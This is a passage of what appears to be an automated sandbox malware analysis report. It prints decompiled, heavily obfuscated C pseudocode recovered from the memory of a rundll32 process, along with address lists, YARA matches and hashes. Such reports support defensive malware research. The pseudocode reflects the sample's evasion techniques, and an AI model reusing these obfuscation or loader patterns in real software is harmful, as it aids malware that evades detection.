				_v292 = _v292 + 0x6c9c;
				_v292 = _v292 << 0xa;
				_v292 = _v292 ^ 0xffe355d2;
				_v260 = 0x7acb;
				_v260 = _v260 + 0xffffa0ea;
				_v260 = _v260 | 0x99ee16c0;
				_v260 = _v260 ^ 0x99ee2715;
				_v236 = 0x660;
				_v236 = _v236 >> 3;
				_v236 = _v236 ^ 0xfad9dcdf;
				_v236 = _v236 ^ 0xfad9c9f6;
				_v188 = 0x2ec9;
				_v188 = _v188 * 0x1e;
				_v188 = _v188 ^ 0x00056cd6;
				_v176 = 0xdb2b;
				_v176 = _v176 + 0x1ae1;
				_v176 = _v176 ^ 0x0000f432;
				_v308 = 0x4019;
				_v308 = _v308 | 0x5723cddb;
				_v308 = _v308 << 6;
				_v308 = _v308 + 0xffff2d56;
				_v308 = _v308 ^ 0xc8f2fe5d;
				_v168 = 0x4395;
				_v168 = _v168 ^ 0x67ca4501;
				_v168 = _v168 ^ 0x67ca76df;
				_v264 = 0x84c6;
				_v264 = _v264 | 0x00adff5b;
				_v264 = _v264 + 0x6303;
				_v264 = _v264 ^ 0x00ae478b;
				_v244 = 0x4752;
				_v244 = _v244 + 0x93ca;
				_v244 = _v244 >> 9;
				_v244 = _v244 ^ 0x00006083;
				_v160 = 0x645a;
				_v160 = _v160 << 6;
				_v160 = _v160 ^ 0x00191e2a;
				_v276 = 0x9751;
				_v276 = _v276 << 8;
				_v276 = _v276 + 0xffff5caf;
				_t480 = 0xa;
				_v276 = _v276 / _t480;
				_v276 = _v276 ^ 0x000f67c9;
				_v180 = 0x8794;
				_v180 = _v180 << 2;
				_v180 = _v180 ^ 0x00025325;
				_v320 = 0x9a55;
				_v320 = _v320 << 0xf;
				_v320 = _v320 << 0xa;
				_t481 = 0x55;
				_v320 = _v320 * 0x4d;
				_v320 = _v320 ^ 0x22000a83;
				_v248 = 0xe379;
				_v248 = _v248 >> 7;
				_v248 = _v248 >> 0xc;
				_v248 = _v248 ^ 0x00003db5;
				_v284 = 0xccf8;
				_v284 = _v284 + 0x1e46;
				_v284 = _v284 * 0x38;
				_v284 = _v284 * 0x58;
				_v284 = _v284 ^ 0x11b007cd;
				_v300 = 0x32ae;
				_v300 = _v300 << 2;
				_v300 = _v300 >> 0x10;
				_v300 = _v300 << 0xe;
				_v300 = _v300 ^ 0x00000792;
				_v216 = 0x5329;
				_v216 = _v216 + 0xb5c4;
				_v216 = _v216 ^ 0x00016a2e;
				_v256 = 0xf2a3;
				_v256 = _v256 / _t481;
				_v256 = _v256 >> 6;
				_v256 = _v256 ^ 0x00001717;
				_v304 = 0x96fc;
				_v304 = _v304 | 0xda0a5c24;
				_t482 = 0x2b;
				_v304 = _v304 * 0x37;
				_v304 = _v304 + 0xd389;
				_v304 = _v304 ^ 0xd856d340;
				_v240 = 0x24a9;
				_v240 = _v240 >> 0xf;
				_v240 = _v240 | 0xd0db0b52;
				_v240 = _v240 ^ 0xd0db68a6;
				_v312 = 0x7296;
				_v312 = _v312 << 5;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 >> 0x10;
				_v312 = _v312 ^ 0x000057a1;
				_v204 = 0xffd2;
				_v204 = _v204 + 0x4d88;
				_v204 = _v204 ^ 0x000119e7;
				_v316 = 0x8b8b;
				_v316 = _v316 / _t482;
				_v316 = _v316 ^ 0x980bb32c;
				_v316 = _v316 ^ 0xc4a4ea1d;
				_v316 = _v316 ^ 0x5caf30c9;
				_v268 = 0x337b;
				_v268 = _v268 + 0x5b7d;
				_v268 = _v268 + 0x12aa;
				_v268 = _v268 ^ 0x0000b326;
				_v296 = 0xc10a;
				_v296 = _v296 + 0xffff865a;
				_v296 = _v296 + 0x4a11;
				_v296 = _v296 + 0xffff623b;
				_v296 = _v296 ^ 0xffffbd38;
				_v208 = 0x68d9;
				_v208 = _v208 << 0xa;
				_v208 = _v208 ^ 0x01a30f5d;
				_v192 = 0x7a63;
				_v192 = _v192 << 0xc;
				_v192 = _v192 ^ 0x07a656ca;
				_v200 = 0x6d3e;
				_v200 = _v200 << 7;
				_v200 = _v200 ^ 0x003687c2;
				_v288 = 0x5a10;
				_v288 = _v288 << 9;
				_t483 = 0x69;
				_v288 = _v288 / _t483;
				_v288 = _v288 + 0x4454;
				_v288 = _v288 ^ 0x0001df75;
				_v224 = 0x28de;
				_v224 = _v224 >> 0xa;
				_v224 = _v224 + 0xffff52ce;
				_v224 = _v224 ^ 0xffff05f8;
				_v272 = 0xab64;
				_v272 = _v272 + 0xfffffe6e;
				_v272 = _v272 >> 4;
				_v272 = _v272 ^ 0xa501867a;
				_v272 = _v272 ^ 0xa501bad7;
				_v184 = 0xdf13;
				_v184 = _v184 + 0x420b;
				_v184 = _v184 ^ 0x00013cc7;
				_v280 = 0x5728;
				_v280 = _v280 + 0xffffcc3b;
				_v280 = _v280 + 0x76b7;
				_t484 = 0x61;
				_t493 = _a4;
				_t485 = _v148;
				_t433 = _v148;
				_v280 = _v280 / _t484;
				_v280 = _v280 ^ 0x00007737;
				while(_t486 != 0x9208284) {
					if(_t486 == 0xa621ed2) {
						E01FF6374(_v204, _t485,  *((intOrPtr*)(_t436 + 4)),  *_t436, _v316);
						_t436 = _v152;
						_t494 =  &(_t494[3]);
						_t486 = 0x29b23c8e;
						_t485 = _t485 +  *((intOrPtr*)(_t436 + 4));
						continue;
					}
					if(_t486 == 0x29b23c8e) {
						_push(0x1ff151c);
						_push(_v208);
						E01FFE9D6(_v192, __eflags, E0200CF31(_v268, _v296, __eflags), _v200, _v148, _v288, _v224, _t485);
						E02000D6D(_v272, _v184, _v280, _t420);
						return 1;
					}
					if(_t486 == 0x2fd49363) {
						_v156 = E01FFA156();
						_t486 = 0x34a28646;
						L9:
						_t436 = _v152;
						continue;
					}
					if(_t486 == 0x34a28646) {
						_t486 = 0x37f3463b;
						_a4 =  *((intOrPtr*)(_t436 + 4)) + 0x1000;
						continue;
					}
					if(_t486 != 0x37f3463b) {
						L14:
						__eflags = _t486 - 0x2874212b;
						if(__eflags != 0) {
							continue;
						}
						L15:
						__eflags = 0;
						return 0;
					}
					_push(_t436);
					_t485 = E01FF54FB(_a4);
					 *_t493 = _t485;
					if(_t485 == 0) {
						goto L15;
					}
					_t486 = 0x9208284;
					_t433 = _a4 + _t485;
					goto L9;
				}
				_t406 = E01FFF569(_v220,  &_v156, _v232, _v164);
				_t495 =  &(_t494[1]);
				_t339 = (_t406 & 0x0000000f) + 4; // 0x4
				E01FFEF7F(_t339, _v228, _v292,  &_v156,  &_v128, _v260);
				 *((char*)(_t495 + (_t406 & 0x0000000f) + 0xf0)) = 0;
				_t410 = E01FFF569(_v236,  &_v156, _v188, _v176);
				_t496 =  &(_t495[7]);
				_t352 = (_t410 & 0x0000000f) + 4; // 0x4
				E01FFEF7F(_t352, _v168, _v264,  &_v156,  &_v64, _v244);
				_push(0x1ff15ac);
				_push(_v180);
				 *((char*)(_t496 + (_t410 & 0x0000000f) + 0x134)) = 0;
				_t417 = E01FFD28D( &_v128, __eflags, _t433 - _t485, _v320, _v148, E0200CF31(_v160, _v276, __eflags), _v248, _v284, _v300, _v216, _v256, _t485);
				_t494 =  &(_t496[0x12]);
				_t485 = _t485 + _t417;
				__eflags = _t485;
				E02000D6D(_v304, _v240, _v312, _t414);
				_t436 = _v152;
				_t486 = 0xa621ed2;
				goto L14;
			}







































































                                                                      0x02007187
                                                                      0x02007187
                                                                      0x0200718d
                                                                      0x0200719a
                                                                      0x020071a1
                                                                      0x020071a8
                                                                      0x020071b3
                                                                      0x020071c9
                                                                      0x020071d0
                                                                      0x020071d9
                                                                      0x020071e0
                                                                      0x020071e5
                                                                      0x020071ee
                                                                      0x020071f9
                                                                      0x02007204
                                                                      0x0200720f
                                                                      0x0200721a
                                                                      0x02007225
                                                                      0x02007230
                                                                      0x0200723b
                                                                      0x02007243
                                                                      0x0200724b
                                                                      0x02007253
                                                                      0x0200725b
                                                                      0x02007267
                                                                      0x0200726a
                                                                      0x0200726e
                                                                      0x02007276
                                                                      0x02007281
                                                                      0x02007289
                                                                      0x02007294
                                                                      0x0200729c
                                                                      0x020072a4
                                                                      0x020072ac
                                                                      0x020072b4
                                                                      0x020072bc
                                                                      0x020072c4
                                                                      0x020072cc
                                                                      0x020072d4
                                                                      0x020072dc
                                                                      0x020072e4
                                                                      0x020072ec
                                                                      0x020072f1
                                                                      0x020072f9
                                                                      0x02007301
                                                                      0x02007309
                                                                      0x02007311
                                                                      0x02007319
                                                                      0x02007321
                                                                      0x02007326
                                                                      0x0200732e
                                                                      0x02007336
                                                                      0x02007349
                                                                      0x02007350
                                                                      0x0200735b
                                                                      0x02007366
                                                                      0x02007371
                                                                      0x0200737c
                                                                      0x02007384
                                                                      0x0200738c
                                                                      0x02007391
                                                                      0x02007399
                                                                      0x020073a1
                                                                      0x020073ac
                                                                      0x020073b7
                                                                      0x020073c2
                                                                      0x020073ca
                                                                      0x020073d2
                                                                      0x020073da
                                                                      0x020073e2
                                                                      0x020073ec
                                                                      0x020073f4
                                                                      0x020073f9
                                                                      0x02007401
                                                                      0x0200740c
                                                                      0x02007414
                                                                      0x0200741f
                                                                      0x02007427
                                                                      0x0200742c
                                                                      0x0200743a
                                                                      0x0200743f
                                                                      0x02007445
                                                                      0x0200744d
                                                                      0x02007458
                                                                      0x02007460
                                                                      0x0200746b
                                                                      0x02007473
                                                                      0x02007478
                                                                      0x02007482
                                                                      0x02007485
                                                                      0x02007489
                                                                      0x02007491
                                                                      0x02007499
                                                                      0x0200749e
                                                                      0x020074a3
                                                                      0x020074ab
                                                                      0x020074b3
                                                                      0x020074c0
                                                                      0x020074c9
                                                                      0x020074cd
                                                                      0x020074d5
                                                                      0x020074dd
                                                                      0x020074e2
                                                                      0x020074e7
                                                                      0x020074ec
                                                                      0x020074f4
                                                                      0x020074fc
                                                                      0x02007504
                                                                      0x0200750c
                                                                      0x0200751c
                                                                      0x02007520
                                                                      0x02007525
                                                                      0x0200752d
                                                                      0x02007535
                                                                      0x02007542
                                                                      0x02007543
                                                                      0x02007547
                                                                      0x0200754f
                                                                      0x02007557
                                                                      0x0200755f
                                                                      0x02007564
                                                                      0x0200756c
                                                                      0x02007574
                                                                      0x0200757c
                                                                      0x02007581
                                                                      0x02007586
                                                                      0x0200758b
                                                                      0x02007593
                                                                      0x0200759e
                                                                      0x020075a9
                                                                      0x020075b4
                                                                      0x020075c2
                                                                      0x020075c6
                                                                      0x020075ce
                                                                      0x020075d6
                                                                      0x020075e0
                                                                      0x020075e8
                                                                      0x020075f0
                                                                      0x020075f8
                                                                      0x02007600
                                                                      0x02007608
                                                                      0x02007610
                                                                      0x02007618
                                                                      0x02007620
                                                                      0x02007628
                                                                      0x02007633
                                                                      0x0200763b
                                                                      0x02007646
                                                                      0x02007651
                                                                      0x02007659
                                                                      0x02007664
                                                                      0x0200766f
                                                                      0x02007677
                                                                      0x02007682
                                                                      0x0200768a
                                                                      0x02007695
                                                                      0x0200769a
                                                                      0x020076a0
                                                                      0x020076a8
                                                                      0x020076b0
                                                                      0x020076b8
                                                                      0x020076bd
                                                                      0x020076c5
                                                                      0x020076cd
                                                                      0x020076d5
                                                                      0x020076dd
                                                                      0x020076e2
                                                                      0x020076ea
                                                                      0x020076f2
                                                                      0x020076fd
                                                                      0x02007708
                                                                      0x02007713
                                                                      0x0200771b
                                                                      0x02007723
                                                                      0x0200772f
                                                                      0x02007732
                                                                      0x02007739
                                                                      0x02007740
                                                                      0x02007747
                                                                      0x0200774b
                                                                      0x02007753
                                                                      0x02007765
                                                                      0x02007809
                                                                      0x0200780e
                                                                      0x02007815
                                                                      0x02007818
                                                                      0x0200781d
                                                                      0x00000000
                                                                      0x0200781d
                                                                      0x02007771
                                                                      0x02007972
                                                                      0x02007977
                                                                      0x020079b0
                                                                      0x020079c5
                                                                      0x00000000
                                                                      0x020079cf
                                                                      0x0200777d
                                                                      0x020077e9
                                                                      0x020077f0
                                                                      0x020077bf
                                                                      0x020077bf
                                                                      0x00000000
                                                                      0x020077bf
                                                                      0x02007785
                                                                      0x020077cb
                                                                      0x020077d5
                                                                      0x00000000
                                                                      0x020077d5
                                                                      0x0200778d
                                                                      0x02007959
                                                                      0x02007959
                                                                      0x0200795f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x02007965
                                                                      0x02007965
                                                                      0x00000000
                                                                      0x02007965
                                                                      0x020077a1
                                                                      0x020077a7
                                                                      0x020077a9
                                                                      0x020077af
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x020077b8
                                                                      0x020077bd
                                                                      0x00000000
                                                                      0x020077bd
                                                                      0x0200783b
                                                                      0x02007840
                                                                      0x02007853
                                                                      0x0200786e
                                                                      0x02007881
                                                                      0x02007897
                                                                      0x0200789c
                                                                      0x020078af
                                                                      0x020078ca
                                                                      0x020078cf
                                                                      0x020078d4
                                                                      0x020078e6
                                                                      0x0200792f
                                                                      0x02007934
                                                                      0x02007937
                                                                      0x02007937
                                                                      0x02007946
                                                                      0x0200794d
                                                                      0x02007954
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
                                                                      • API String ID: 0-1558577346
                                                                      • Opcode ID: e2de858ffcc13a891915fefacf3f3a2edd60ff76bd7b011f0df01e05dc889161
                                                                      • Instruction ID: ee1ae42d643f2b83f6c3a4e988f0fc4df27ba7f188820019be8e283b3bc32485
                                                                      • Opcode Fuzzy Hash: e2de858ffcc13a891915fefacf3f3a2edd60ff76bd7b011f0df01e05dc889161
                                                                      • Instruction Fuzzy Hash: C41232725083819FE3A4CF25C489A8FFBE1BBC4758F00891DE5D9962A0D7B99909CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 002466FB, Relevance: 15.4, Strings: 12, Instructions: 369COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (W$)S$+!t($7w$>m$TD$Xy@$Zd$cz$y$}[$0
                                                                      • API String ID: 0-1558577346
                                                                      • Opcode ID: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
                                                                      • Instruction ID: bfe1e8c0f19e88671d1c5bd1d884f441564dec12e7086b1c85ff7031de173b3f
                                                                      • Opcode Fuzzy Hash: c996e793aa92d32c9d4ee85a689b4a155b856a04444eddf3dc1470e7b71cd492
                                                                      • Instruction Fuzzy Hash: 0E1210B2508381DFE3A4CF25C589A8BFBE2BBC5718F10891DE5D996260D7B58909CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200D02D, Relevance: 15.2, Strings: 12, Instructions: 235COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 90%
                                                                      			E0200D02D() {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				void* _t261;
				void* _t264;
				void* _t276;
				intOrPtr _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				signed int _t305;
				signed int* _t308;

				_t308 =  &_v1668;
				_v1568 = 0x1b7baa;
				_t276 = 0x2bf07c54;
				_v1564 = 0;
				_v1620 = 0x5ac8;
				_v1620 = _v1620 | 0x6f7e2d8c;
				_v1620 = _v1620 + 0x1161;
				_v1620 = _v1620 ^ 0x6f7e9104;
				_v1632 = 0x343;
				_v1632 = _v1632 * 0x4f;
				_t299 = 0;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 + 0xffffca78;
				_v1632 = _v1632 ^ 0x203536e7;
				_v1640 = 0xae45;
				_v1640 = _v1640 >> 9;
				_t300 = 0x1d;
				_v1640 = _v1640 * 0x65;
				_v1640 = _v1640 + 0xffffcd5a;
				_v1640 = _v1640 ^ 0xffffb49c;
				_v1648 = 0xf6df;
				_v1648 = _v1648 ^ 0x32487b57;
				_v1648 = _v1648 << 0xf;
				_v1648 = _v1648 + 0xffff3bb0;
				_v1648 = _v1648 ^ 0x46c37aca;
				_v1656 = 0xe0fe;
				_v1656 = _v1656 | 0xbb3f58fa;
				_v1656 = _v1656 >> 1;
				_v1656 = _v1656 ^ 0x4bc4dda6;
				_v1656 = _v1656 ^ 0x165b1a8c;
				_v1664 = 0xf6b0;
				_v1664 = _v1664 * 0x33;
				_v1664 = _v1664 + 0xf145;
				_v1664 = _v1664 | 0xcc479c42;
				_v1664 = _v1664 ^ 0xcc77be62;
				_v1624 = 0x11e5;
				_v1624 = _v1624 >> 0xd;
				_v1624 = _v1624 ^ 0x0c673627;
				_v1624 = _v1624 ^ 0x0c670e7e;
				_v1660 = 0xb30e;
				_v1660 = _v1660 / _t300;
				_v1660 = _v1660 ^ 0x2f8cd0cc;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 ^ 0x335bb46d;
				_v1592 = 0x30a6;
				_v1592 = _v1592 + 0x2da3;
				_v1592 = _v1592 ^ 0x000056bb;
				_v1636 = 0x9dba;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 >> 0xd;
				_v1636 = _v1636 * 0x6e;
				_v1636 = _v1636 ^ 0x000074bb;
				_v1576 = 0xf88b;
				_v1576 = _v1576 >> 8;
				_v1576 = _v1576 ^ 0x00004a5e;
				_v1616 = 0xe870;
				_v1616 = _v1616 + 0xffffed0c;
				_v1616 = _v1616 << 0xa;
				_v1616 = _v1616 ^ 0x03558e80;
				_v1572 = 0x8968;
				_v1572 = _v1572 + 0xffff9e89;
				_v1572 = _v1572 ^ 0x000033ab;
				_v1584 = 0x6f5c;
				_v1584 = _v1584 | 0x7a285989;
				_v1584 = _v1584 ^ 0x7a28059f;
				_v1652 = 0x53fb;
				_t301 = 0x4a;
				_v1652 = _v1652 / _t301;
				_t302 = 0x51;
				_v1652 = _v1652 * 0x2e;
				_v1652 = _v1652 / _t302;
				_v1652 = _v1652 ^ 0x00006fe4;
				_v1644 = 0x731a;
				_v1644 = _v1644 | 0xb42c1025;
				_t303 = 0x26;
				_v1644 = _v1644 / _t303;
				_v1644 = _v1644 | 0x5ebde771;
				_v1644 = _v1644 ^ 0x5ebd9fe9;
				_v1608 = 0x9c04;
				_v1608 = _v1608 + 0xffffbe0d;
				_t304 = 0xf;
				_v1608 = _v1608 * 6;
				_v1608 = _v1608 ^ 0x00025ea7;
				_v1668 = 0x85df;
				_v1668 = _v1668 ^ 0xd0bd5991;
				_v1668 = _v1668 ^ 0x5dcfb772;
				_v1668 = _v1668 | 0x361cad49;
				_v1668 = _v1668 ^ 0xbf7e8aa2;
				_v1628 = 0x5370;
				_v1628 = _v1628 + 0x8359;
				_v1628 = _v1628 | 0x35599af6;
				_v1628 = _v1628 ^ 0x3559ade8;
				_v1600 = 0x3375;
				_v1600 = _v1600 + 0xffffeb08;
				_v1600 = _v1600 >> 0xd;
				_v1600 = _v1600 ^ 0x00002cf7;
				_v1596 = 0x275b;
				_v1596 = _v1596 + 0x8562;
				_v1596 = _v1596 / _t304;
				_v1596 = _v1596 ^ 0x000042b5;
				_v1588 = 0xe1bb;
				_t305 = 0x3c;
				_v1588 = _v1588 / _t305;
				_v1588 = _v1588 ^ 0x00004bb0;
				_v1604 = 0x7428;
				_v1604 = _v1604 | 0x56b3a402;
				_v1604 = _v1604 + 0xffffe147;
				_v1604 = _v1604 ^ 0x56b399df;
				_v1612 = 0xaa76;
				_v1612 = _v1612 + 0x75ae;
				_v1612 = _v1612 | 0x3c256991;
				_v1612 = _v1612 ^ 0x3c250096;
				_v1580 = 0xd062;
				_v1580 = _v1580 ^ 0x00008aa5;
				do {
					while(_t276 != 0x1ed979be) {
						if(_t276 == 0x2bf07c54) {
							_push(_t276);
							E01FF471A(_v1620,  &_v1560, _v1632, _v1640, _v1648, _v1656, _v1664);
							_t308 =  &(_t308[8]);
							_t276 = 0x2f47d6b1;
							continue;
						} else {
							_t312 = _t276 - 0x2f47d6b1;
							if(_t276 == 0x2f47d6b1) {
								_push(0x1ff1308);
								_push(_v1636);
								_push(_v1592);
								_t264 = E01FF5DFC(_v1624, _v1660, _t312);
								E0200D4E1( &_v1040, _t312);
								E01FF98C5(0x104, _t312, _v1576, _v1616, _v1572, _v1584, _v1652,  *0x2011088 + 0x254, _v1644, _v1608,  &_v1040,  *0x2011088 + 0x38, _t264,  &_v1560);
								E02000D6D(_v1668, _v1628, _v1600, _t264);
								_t308 =  &(_t308[0x11]);
								_t276 = 0x1ed979be;
								continue;
							}
						}
						goto L7;
					}
					_push(0);
					_push( &_v520);
					_push(_v1580);
					_push(_v1612);
					_push(_v1604);
					_push(_v1588);
					_push(0);
					_push(0);
					_t261 = E01FF6417(_v1596, __eflags);
					_t308 =  &(_t308[8]);
					__eflags = _t261;
					_t299 =  !=  ? 1 : _t299;
					_t276 = 0x35e6e12b;
					L7:
					__eflags = _t276 - 0x35e6e12b;
				} while (__eflags != 0);
				return _t299;
			}












































                                                                      0x0200d02d
                                                                      0x0200d033
                                                                      0x0200d040
                                                                      0x0200d045
                                                                      0x0200d049
                                                                      0x0200d051
                                                                      0x0200d059
                                                                      0x0200d061
                                                                      0x0200d069
                                                                      0x0200d07b
                                                                      0x0200d07f
                                                                      0x0200d081
                                                                      0x0200d086
                                                                      0x0200d08e
                                                                      0x0200d096
                                                                      0x0200d09e
                                                                      0x0200d0a8
                                                                      0x0200d0ab
                                                                      0x0200d0af
                                                                      0x0200d0b7
                                                                      0x0200d0bf
                                                                      0x0200d0c7
                                                                      0x0200d0cf
                                                                      0x0200d0d4
                                                                      0x0200d0dc
                                                                      0x0200d0e4
                                                                      0x0200d0ec
                                                                      0x0200d0f4
                                                                      0x0200d0f8
                                                                      0x0200d100
                                                                      0x0200d108
                                                                      0x0200d115
                                                                      0x0200d119
                                                                      0x0200d121
                                                                      0x0200d129
                                                                      0x0200d131
                                                                      0x0200d139
                                                                      0x0200d13e
                                                                      0x0200d146
                                                                      0x0200d14e
                                                                      0x0200d15c
                                                                      0x0200d160
                                                                      0x0200d168
                                                                      0x0200d16d
                                                                      0x0200d175
                                                                      0x0200d17d
                                                                      0x0200d185
                                                                      0x0200d18d
                                                                      0x0200d195
                                                                      0x0200d19a
                                                                      0x0200d1a4
                                                                      0x0200d1a8
                                                                      0x0200d1b0
                                                                      0x0200d1b8
                                                                      0x0200d1bd
                                                                      0x0200d1c5
                                                                      0x0200d1cd
                                                                      0x0200d1d5
                                                                      0x0200d1da
                                                                      0x0200d1e2
                                                                      0x0200d1ea
                                                                      0x0200d1f2
                                                                      0x0200d1fa
                                                                      0x0200d202
                                                                      0x0200d20a
                                                                      0x0200d214
                                                                      0x0200d220
                                                                      0x0200d225
                                                                      0x0200d235
                                                                      0x0200d238
                                                                      0x0200d244
                                                                      0x0200d248
                                                                      0x0200d250
                                                                      0x0200d258
                                                                      0x0200d264
                                                                      0x0200d269
                                                                      0x0200d26f
                                                                      0x0200d277
                                                                      0x0200d27f
                                                                      0x0200d287
                                                                      0x0200d294
                                                                      0x0200d297
                                                                      0x0200d29b
                                                                      0x0200d2a3
                                                                      0x0200d2ab
                                                                      0x0200d2b3
                                                                      0x0200d2bb
                                                                      0x0200d2c3
                                                                      0x0200d2cb
                                                                      0x0200d2d3
                                                                      0x0200d2db
                                                                      0x0200d2e3
                                                                      0x0200d2eb
                                                                      0x0200d2f3
                                                                      0x0200d2fb
                                                                      0x0200d300
                                                                      0x0200d308
                                                                      0x0200d310
                                                                      0x0200d320
                                                                      0x0200d324
                                                                      0x0200d32c
                                                                      0x0200d338
                                                                      0x0200d33b
                                                                      0x0200d33f
                                                                      0x0200d347
                                                                      0x0200d34f
                                                                      0x0200d357
                                                                      0x0200d35f
                                                                      0x0200d367
                                                                      0x0200d36f
                                                                      0x0200d377
                                                                      0x0200d37f
                                                                      0x0200d387
                                                                      0x0200d397
                                                                      0x0200d39f
                                                                      0x0200d39f
                                                                      0x0200d3b1
                                                                      0x0200d464
                                                                      0x0200d485
                                                                      0x0200d48a
                                                                      0x0200d48d
                                                                      0x00000000
                                                                      0x0200d3b7
                                                                      0x0200d3b7
                                                                      0x0200d3b9
                                                                      0x0200d3bf
                                                                      0x0200d3c4
                                                                      0x0200d3c8
                                                                      0x0200d3d4
                                                                      0x0200d3e2
                                                                      0x0200d43d
                                                                      0x0200d452
                                                                      0x0200d457
                                                                      0x0200d45a
                                                                      0x00000000
                                                                      0x0200d45a
                                                                      0x0200d3b9
                                                                      0x00000000
                                                                      0x0200d3b1
                                                                      0x0200d494
                                                                      0x0200d49c
                                                                      0x0200d49d
                                                                      0x0200d4a1
                                                                      0x0200d4a5
                                                                      0x0200d4a9
                                                                      0x0200d4b1
                                                                      0x0200d4b2
                                                                      0x0200d4b3
                                                                      0x0200d4ba
                                                                      0x0200d4be
                                                                      0x0200d4c0
                                                                      0x0200d4c3
                                                                      0x0200d4c8
                                                                      0x0200d4c8
                                                                      0x0200d4c8
                                                                      0x0200d4e0

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
                                                                      • API String ID: 0-2856137141
                                                                      • Opcode ID: b0f86fa86cfaae11668ea771071c0c9c74933f09823ed522ebc9c0309be1f3a7
                                                                      • Instruction ID: c64d3df6154461ce966fefc2925dfd6e969094feeb51e995bc108870325dcac7
                                                                      • Opcode Fuzzy Hash: b0f86fa86cfaae11668ea771071c0c9c74933f09823ed522ebc9c0309be1f3a7
                                                                      • Instruction Fuzzy Hash: D0C121715083809FE368CF65C98995BFBE1FBC4758F104A1DF286862A0D7B9CA49CF42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024C5A1, Relevance: 15.2, Strings: 12, Instructions: 235COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (t$+5$+5$W{H2$['$\o$^J$pS$p$u3$65 $o
                                                                      • API String ID: 0-2856137141
                                                                      • Opcode ID: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
                                                                      • Instruction ID: fe6c56e5695355ecff4ac2acc9f8649dde225d7ca0afcf149b2453adde370018
                                                                      • Opcode Fuzzy Hash: 902fb5a5338738160e621409dfb9f9346e4afdcae1733b59e629423e593282c2
                                                                      • Instruction Fuzzy Hash: 99C111B15083819FD368CF25C98A95BFBF1BBC4758F104A1DF196862A0D7B98A49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF3336, Relevance: 15.2, Strings: 12, Instructions: 153COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 91%
                                                                      			E01FF3336(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a20) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				unsigned int _v64;
				void* _t123;
				intOrPtr _t134;
				void* _t135;
				void* _t139;
				void* _t141;
				signed int _t153;
				signed int _t154;
				void* _t156;
				signed int* _t160;

				_push(_a20);
				_t139 = __ecx;
				_push(_a16);
				_push(1);
				_push(_a8);
				_push(1);
				_push(__edx);
				_push(__ecx);
				E02002550(_t123);
				_v60 = 0x58ef;
				_t160 =  &(( &_v64)[7]);
				_v60 = _v60 + 0xffff0633;
				_v60 = _v60 >> 9;
				_t156 = 0;
				_t141 = 0x2a642033;
				_t153 = 0x63;
				_v60 = _v60 * 0x2a;
				_v60 = _v60 ^ 0x14ffaedf;
				_v20 = 0x6a04;
				_v20 = _v20 + 0x32d0;
